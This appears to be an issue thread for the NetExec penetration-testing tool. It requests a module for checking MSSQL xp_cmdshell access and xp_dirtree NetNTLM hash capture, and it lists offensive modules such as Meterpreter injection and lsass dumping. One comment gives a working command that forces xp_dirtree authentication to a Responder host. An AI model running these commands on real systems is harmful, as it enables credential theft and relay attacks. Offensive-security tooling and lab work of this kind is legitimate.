[MSSQL] Add module/option for testing *xp_cmdshell* & *xp_dirtree*

[clem9669]

Hi 👋

It would be very nice to have a module or an option for testing if:

• xp_cmdshell is enabled or the current have sufficient privileges
• xp_dirtree can be use to grab NetNTLM authentication

$ netexec mssql -u 'MSSQLSERVER' -p 'X' -d certified.htb 10.129.236.111 -L              
LOW PRIVILEGE MODULES
[*] mssql_priv                Enumerate and exploit MSSQL privileges

HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject                Downloads the Meterpreter stager and injects it into memory
[*] nanodump                  Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection           Pings a host
[*] web_delivery              Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module

$ mssqlclient.py MSSQLSERVER:[email protected] -windows-auth                                       

[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (CERTIFIEDDC\MSSQLSERVER  guest@master)> help

    enable_xp_cmdshell         - you know what it means
    disable_xp_cmdshell         - you know what it means
    xp_cmdshell {cmd}           - executes cmd using xp_cmdshell
    xp_dirtree {path}            - executes xp_dirtree on the path

Cheers 🚀

[ville87]

FYI: If anyone hasn't already figured out, you can do the xp_dirtree for hash capturing or relaying simply by running the query on the target(s):
nxc mssql -u user01 -p '<pw>' --dns-server 10.10.10.1 -d domain.tld -q 'EXEC xp_dirtree "\\<Responder-IP>\hellofromnxc"' /home/kali/mssql_targets.txt

[NeffIsBack]

Oh yes, take a look at #456 :)